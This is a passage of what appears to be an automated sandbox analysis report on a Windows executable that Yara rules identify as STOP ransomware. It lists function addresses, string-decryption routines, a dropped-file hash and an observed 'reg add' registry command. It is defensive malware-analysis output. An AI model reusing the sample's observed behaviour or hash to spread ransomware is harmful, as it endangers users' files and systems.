Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044ACFF	9_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0042CE51	9_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00434E0B	9_2_00434E0B
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00406EE0	9_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00420F30	9_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00405057	9_2_00405057
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0042F010	9_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004070E0	9_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004391F6	9_2_004391F6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00435240	9_2_00435240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004C9343	9_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00405447	9_2_00405447
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00405457	9_2_00405457
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00449506	9_2_00449506
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044B5B1	9_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00435675	9_2_00435675
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00409686	9_2_00409686
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040F730	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044D7A1	9_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00481920	9_2_00481920
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044D9DC	9_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00449A71	9_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00443B40	9_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00409CF9	9_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040DD40	9_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00427D6C	9_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040BDC0	9_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00409DFA	9_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00409F76	9_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0046BFE0	9_2_0046BFE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00449FE3	9_2_00449FE3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A43520	13_2_04A43520
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47520	13_2_04A47520
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A8B69F	13_2_04A8B69F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4A699	13_2_04A4A699
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4E6E0	13_2_04A4E6E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4A79A	13_2_04A4A79A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A6D7F1	13_2_04A6D7F1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4C760	13_2_04A4C760
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4B0B0	13_2_04A4B0B0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A470E0	13_2_04A470E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A430F0	13_2_04A430F0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A500D0	13_2_04A500D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4A026	13_2_04A4A026
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A5F030	13_2_04A5F030
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4B000	13_2_04A4B000
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A6D1A4	13_2_04A6D1A4
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A49120	13_2_04A49120
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A8E141	13_2_04A8E141
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04AC22C0	13_2_04AC22C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47220	13_2_04A47220
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47393	13_2_04A47393
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A8E37C	13_2_04A8E37C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A45DE7	13_2_04A45DE7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A45DF7	13_2_04A45DF7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A82D1E	13_2_04A82D1E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A74E9F	13_2_04A74E9F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A48E60	13_2_04A48E60
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47880	13_2_04A47880
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A618D0	13_2_04A618D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A6E9A3	13_2_04A6E9A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A6F9B0	13_2_04A6F9B0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A459F7	13_2_04A459F7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A489D0	13_2_04A489D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4A916	13_2_04A4A916
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47A80	13_2_04A47A80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4CA10	13_2_04A4CA10
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4DBE0	13_2_04A4DBE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A50B00	13_2_04A50B00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A42B60	13_2_04A42B60
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00419F90	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040C070	14_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0042E003	14_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00408030	14_2_00408030
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00410160	14_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004021C0	14_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044237E	14_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004084C0	14_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004344FF	14_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0043E5A3	14_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040A660	14_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0041E690	14_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00406740	14_2_00406740
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00402750	14_2_00402750
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040A710	14_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00408780	14_2_00408780
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0042C804	14_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00406880	14_2_00406880
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004349F3	14_2_004349F3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004069F3	14_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00402B80	14_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00406B80	14_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044ACFF	14_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0042CE51	14_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00434E0B	14_2_00434E0B
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00406EE0	14_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00420F30	14_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00405057	14_2_00405057
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0042F010	14_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004070E0	14_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004391F6	14_2_004391F6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040D240	14_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00435240	14_2_00435240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004C9343	14_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00405447	14_2_00405447
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00405457	14_2_00405457
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00449506	14_2_00449506
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044B5B1	14_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00435675	14_2_00435675
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00409686	14_2_00409686
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040F730	14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044D7A1	14_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00481920	14_2_00481920
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044D9DC	14_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00449A71	14_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00443B40	14_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00409CF9	14_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040DD40	14_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00427D6C	14_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040BDC0	14_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00409DFA	14_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00409F76	14_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0046BFE0	14_2_0046BFE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00449FE3	14_2_00449FE3

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe B1E829E912594D5AF36D66E7F55362A9A07BE9F44D9683F59390B0B731C9DFD3
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\33A3.exe B1E829E912594D5AF36D66E7F55362A9A07BE9F44D9683F59390B0B731C9DFD3

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00428C81 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 04A68EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 04A30160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 04A28EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 004547A0 appears 150 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00422587 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 0042F7C0 appears 194 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 0044F23E appears 106 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00428520 appears 154 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 04A70160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00425007 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00454E50 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 0044F26C appears 40 times

One or more processes crash

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1028 -s 10828

Sample file is different than original file name gathered from version info

Source: XVM5nluelx.exe, 00000000.00000000.1990814559.0000000002C8B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesFilezera2 vs XVM5nluelx.exe
Source: XVM5nluelx.exe	Binary or memory string: OriginalFilenamesFilezera2 vs XVM5nluelx.exe

Uses 32bit PE files

Source: XVM5nluelx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

Yara signature match

Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
